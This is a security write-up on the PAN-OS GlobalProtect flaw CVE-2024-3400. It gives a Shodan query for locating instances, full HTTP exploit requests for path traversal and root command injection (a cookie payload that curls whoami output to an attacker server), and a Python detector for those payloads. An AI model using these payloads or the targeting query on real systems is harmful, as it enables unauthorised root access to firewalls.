Exploitation of CVE-2024-3400 | PAN-OS: OS Command Injection in GlobalProtect

ThreatWatch360, published in InfoSec Write-ups, Apr 18, 2024

Overview of the CVE-2024-3400 Vulnerability and Extent of Attack

An important notice was released for Palo Alto firewall products. Kudos to team Volexity, who initially discovered this vulnerability. The Palo Alto security notice highlighted: ‘A security flaw in the GlobalProtect feature of Palo Alto Networks PAN-OS software, present in certain PAN-OS versions and unique feature setups, could allow unauthorized attackers to run arbitrary code with root privileges on affected firewalls. Cloud NGFW, Panorama appliances, and Prisma Access are not affected by this vulnerability.’

Team Volexity tracked threat actor UTA0218 exploiting a command injection vulnerability in Palo Alto Networks’ firewall devices, allowing remote code execution with root privileges. The actor installed a custom Python backdoor, UPSTYLE, to execute commands on compromised devices. To read more about the UPSTYLE backdoor, see Zscaler’s blog.

Exploitation occurred across multiple organizations starting March 26, 2024, with successful deployment of malicious payloads observed on April 10 and 11, 2024. Palo Alto Networks issued an advisory and is expected to release a fix by April 14, 2024.

Understanding the Attack Surface

Shodan ThreatMap of GlobalProtect instances

We used the favicon hash as a Shodan query to identify the IPs of GlobalProtect instances and found approximately 45,000.

Shodan Query: http.favicon.hash:-631559155

Country-wise instances of GlobalProtect

Understanding the exploitation of this vulnerability

This problem affects only PAN-OS 10.2, PAN-OS 11.0, and PAN-OS 11.1 firewalls that have a GlobalProtect gateway or GlobalProtect portal (or both) configured. Even if device telemetry is turned off, PAN-OS firewalls can still be vulnerable to attacks related to this issue. We noted that enabling the ‘Telemetry’ feature is necessary for exploiting this vulnerability successfully.

At this point we had a list of all GlobalProtect IPs collected from various sources, and we decided to identify the instances that were vulnerable to arbitrary code execution as an unauthenticated user. The script’s main objective is to execute arbitrary code with root privileges on firewall devices that are potentially vulnerable.

There are two ways to identify and exploit this vulnerability:

  1. Path traversal
  2. Remote Code Execution (If Telemetry feature is enabled)

Path traversal vulnerability check:

To verify the presence of a path traversal vulnerability, an HTTP request is sent as follows:

POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: 127.0.0.1
Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/poc.txt;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

In this request, the Cookie header contains a path traversal payload (SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/poc.txt;). This payload attempts to create a file named poc.txt in the specified directory (/var/appweb/sslvpndocs/global-protect/portal/images/) with root privileges.

If the system is vulnerable, a request for the poc.txt file will receive a 403 (Forbidden) status code instead of the expected 404 (Not Found).

To confirm the vulnerability, a subsequent HTTP request is sent to access the created file:

GET /global-protect/portal/images/poc.txt HTTP/1.1
Host: 127.0.0.1
Connection: close

This request attempts to access the poc.txt file. If the vulnerability exists, the server will respond with the contents of the poc.txt file, indicating successful exploitation of the path traversal vulnerability.

Execute arbitrary code with root privileges on the firewall

POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: 127.0.0.1
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/h4`curl${IFS}http://OurC2Server?test=$(whoami)`;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

In this HTTP request, a command injection payload is included in the Cookie header. The payload is SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/h4`curl${IFS}http://OurC2Server?test=$(whoami)`; which is crafted to exploit the vulnerability.

If the system is vulnerable, the payload executes the whoami command and sends its output to OurC2Server, a domain controlled by us. This allows us to determine whether the system is vulnerable to command injection and potentially execute further malicious commands.
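As a defender-side complement to the two requests above, the following added example (not part of the original post, and not Palo Alto tooling) parses raw HTTP requests, such as those captured by a reverse proxy or packet capture in front of a GlobalProtect portal, and flags SESSID cookie values that carry the path traversal or command-substitution shapes shown in this post. The function names, watched directories and sample requests are constructed for illustration.

```python
import re
from typing import Dict, List, Optional

# Indicators taken from the two SESSID payload shapes quoted in this post.
TRAVERSAL = re.compile(r"(?:^|/)\.\.(?:/|$)")   # a "../" path segment
SHELL_META = re.compile(r"`|\$\(|\$\{")          # backtick, $( or ${IFS} substitution
WATCHED_DIRS = ("/opt/panlogs/tmp/device_telemetry/", "/var/appweb/sslvpndocs/")

def parse_request(raw: str) -> Dict[str, str]:
    """Split a raw HTTP request into its request line and lower-cased headers."""
    lines = raw.strip().splitlines()
    fields = {"request": lines[0].strip()}
    for line in lines[1:]:
        if not line.strip():                      # blank line ends the headers
            break
        name, _, value = line.partition(":")      # first ':' only; values may hold URLs
        fields[name.strip().lower()] = value.strip()
    return fields

def sessid_value(cookie: str) -> Optional[str]:
    """Return the SESSID cookie value, or None when no SESSID cookie is present."""
    for part in cookie.split(";"):
        name, _, value = part.strip().partition("=")
        if name == "SESSID":
            return value
    return None

def assess_request(raw: str) -> List[str]:
    """Findings for one raw request; an empty list means nothing suspicious."""
    req = parse_request(raw)
    value = sessid_value(req.get("cookie", ""))
    if value is None:
        return []
    findings = []
    if TRAVERSAL.search(value):
        findings.append("SESSID contains path traversal")
    if SHELL_META.search(value):
        findings.append("SESSID contains shell metacharacters")
    findings.extend(f"SESSID targets {d}" for d in WATCHED_DIRS if d in value)
    if findings:
        findings.insert(0, f"suspicious request line: {req['request']}")
    return findings

# Constructed samples: a benign session cookie and the two requests quoted above.
BENIGN = "GET /global-protect/login.esp HTTP/1.1\nHost: 127.0.0.1\nCookie: SESSID=4f2a9c1be7; lang=en\n"
TRAVERSAL_REQ = ("POST /ssl-vpn/hipreport.esp HTTP/1.1\nHost: 127.0.0.1\nCookie: SESSID="
                 "/../../../var/appweb/sslvpndocs/global-protect/portal/images/poc.txt;\n")
CMDINJ_REQ = ("POST /ssl-vpn/hipreport.esp HTTP/1.1\nHost: 127.0.0.1\nCookie: SESSID="
              "/../../../opt/panlogs/tmp/device_telemetry/minute/h4`curl${IFS}http://OurC2Server?test=$(whoami)`;\n")
```

Run assess_request over each captured request; any non-empty result is worth an alert, and a hit on the device_telemetry directory combined with shell metacharacters matches the command injection path described above.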

Proof of concept of successful CVE-2024-3400 exploitation of GlobalProtect instances worldwide

Responsible Disclosure

We have identified multiple instances of GlobalProtect IPs that exhibit exploitable vulnerabilities. Subsequently, we have diligently reported these findings to their respective owners for their attention and remedial action.

We express our gratitude to our Security Research team, ThreatWatch360 for their dedication to monitoring and securing the internet.

ThreatWatch360 identifies threats beyond the corporate perimeter in order to disrupt and neutralize them. Stay tuned for our upcoming launch.